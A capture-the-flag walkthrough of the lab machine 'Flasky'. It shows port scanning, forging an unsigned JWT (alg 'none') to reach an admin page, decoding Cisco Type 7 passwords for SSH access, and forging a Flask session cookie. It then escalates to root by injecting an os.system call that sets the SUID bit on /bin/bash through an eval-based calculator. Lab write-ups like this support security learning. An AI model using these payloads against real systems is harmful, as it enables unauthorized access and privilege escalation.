Flasky

Gaining Access

Nmap scan:

$ nmap -p- --min-rate 3000 -Pn 192.168.201.141
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 14:02 +08
Nmap scan report for 192.168.201.141
Host is up (0.17s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
5555/tcp  open     freeciv
20202/tcp open     ipdtp-port

Ran a detailed scan on the unknown ports.

$ sudo nmap -p 5555,20202 -sC -sV --min-rate 3000 192.168.201.141       
[sudo] password for kali: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 14:03 +08
Nmap scan report for 192.168.201.141
Host is up (0.17s latency).

PORT      STATE SERVICE VERSION
5555/tcp  open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Calculator
|_http-server-header: nginx/1.18.0 (Ubuntu)
20202/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).

Based on the box name, we are likely dealing with a Flask application here.

Web Enum -> JWT Exploit

Port 5555 just shows us a login page:

We don't have any credentials, so let's move on for now.

Port 20202 shows us another login page:

We can use the guest access to view the dashboard, and hints towards abusing JWT:

We can take a look at the cookie value assigned to us:

We can easily change this to exploit it. I also ran a gobuster scan and found an admin directory:

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.201.141:20202 -t 100               
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.201.141:20202
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2023/07/15 14:09:54 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 405) [Size: 178]
/guest                (Status: 200) [Size: 11865]

Visiting it just shows us this:

Running scans against both of these directories show nothing. I checked the requests in Burp, and there are some allowed methods:

We can send POST and OPTIONS requests to this, but we first need to modify our cookie. The JWT cookie has 3 parts, the encryption type, the actual data and the signature. Since we know there's a problem with the JWT, we can abuse this by replacing the encryption type and the payload:

$ echo -n '{"typ":"JWT","alg":"none"}' | base64
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=
$ echo -n '{"id": "0","guest": "false","admin": true}' | base64
eyJpZCI6ICIwIiwiZ3Vlc3QiOiAiZmFsc2UiLCJhZG1pbiI6IHRydWV9

For the signature, since we did not specify an algorithm, we can leave it blank. The full token is thus:

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6ICIwIiwiZ3Vlc3QiOiAiZmFsc2UiLCJhZG1pbiI6IHRydWV9.

We can then send an empty login request to generate a POST request in Burpsuite, and then modify it to include our JWT token:

POST /admin HTTP/1.1
Host: 192.168.201.141:20202
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
Origin: http://192.168.201.141:20202
Connection: close
Referer: http://192.168.201.141:20202/
Cookie: session=eyJsb2dnZWRfaW4iOmZhbHNlfQ.ZLI2-g.jAwlyKLCDrUP8eKqrY5OqHx15j0; JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJpZCI6ICIwIiwiZ3Vlc3QiOiAiZmFsc2UiLCJhZG1pbiI6IHRydWV9.
Upgrade-Insecure-Requests: 1



username=wwwwww&password=w

When we load the request in a Browser, we would see the admin dashboard:

Config -> SSH Creds

At the bottom, we can see users making posts about the configuration files:

This step took forever, but I eventually found the config file at cisco_config.

These are Cisco Type 7 passwords, which can be decrypted here:

Cisco Type 7 Password Decrypt / Decoder / Crack Toolwww.firewall.cx

We can then try each password with ssh, finding that john:NezukoCh@n works.

Privilege Escalation

Calculator Backup -> Root

Within the user's directories, there's a calc.bak file present:

john@Flasky:~$ ls -la *
-rw-r--r-- 1 john john   33 Jul 15 06:02 local.txt

Desktop:
total 8
drwxr-xr-x  2 root root 4096 Apr 23  2021 .
drwxr-xr-x 10 john john 4096 Jul 15 06:15 ..

Documents:
total 12
drwxr-xr-x  2 root root 4096 Apr 23  2021 .
drwxr-xr-x 10 john john 4096 Jul 15 06:15 ..
-r--r-----  1 john john  892 Apr 23  2021 calc.bak

It's the Python source code for the calculator application:

john@Flasky:~/Documents$ cat calc.bak 
########################
# Calculator v1 Backup #
########################

from flask import Flask, render_template, request, session, abort
import os

app = Flask(__name__)

app.config['SECRET_KEY'] = 'Fl@sKy_Sup3R_S3cR3T'

@app.route('/')
def home():
        if not session.get('logged_in'):
                return render_template('login')
        else:
                return "Wrong Pass"

def do_login():
        if user == "xxx" && password == "xxx"
                login()
        else:
                print "Password is incorrect!"

def login():
        if session.get('logged_in'):
                return calc()

def calc():
        if input() == a+b:
                return add()
        if input() == a-b:
                return sub()
        if input() == a/b:
                return div()
        if input() == a*b:
                return mul() 

def add(a, b):
        return str(eval("%s + %s" % (a, b)))
def sub(a, b):
        return str(eval("%s - %s" % (a, b)))
def mul(a, b):
        return str(eval("%s * %s" % (a, b)))
def div(a, b):
        return str(eval("%s / %s" % (a, b)))

Since we have the Flask secret, we can create a cookie to bypass this since it only checks for the logged_in parameter.

$ flask-unsign --sign --cookie "{'logged_in': True}" --secret 'Fl@sKy_Sup3R_S3cR3T'   
eyJsb2dnZWRfaW4iOnRydWV9.ZLI_rA.WmTcl0Wa5jOy8ajsJvWhn6npDKA

This allows us to access the calculator application:

The source code uses eval to calculate the results, which is vulnerable to RCE. We can just inject Python code like this:

POST /div HTTP/1.1
Host: 192.168.201.141:5555
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Origin: http://192.168.201.141:5555
Connection: close
Referer: http://192.168.201.141:5555/
Cookie: session=eyJsb2dnZWRfaW4iOmZhbHNlfQ.ZLI2-g.jAwlyKLCDrUP8eKqrY5OqHx15j0; JWT=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6ICIxIiwiZ3Vlc3QiOiAidHJ1ZSIsImFkbWluIjogZmFsc2V9.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
Upgrade-Insecure-Requests: 1



value1=os.system("chmod+u%2bs+/bin/bash")&value2=1

Then, we can become root:

Rooted!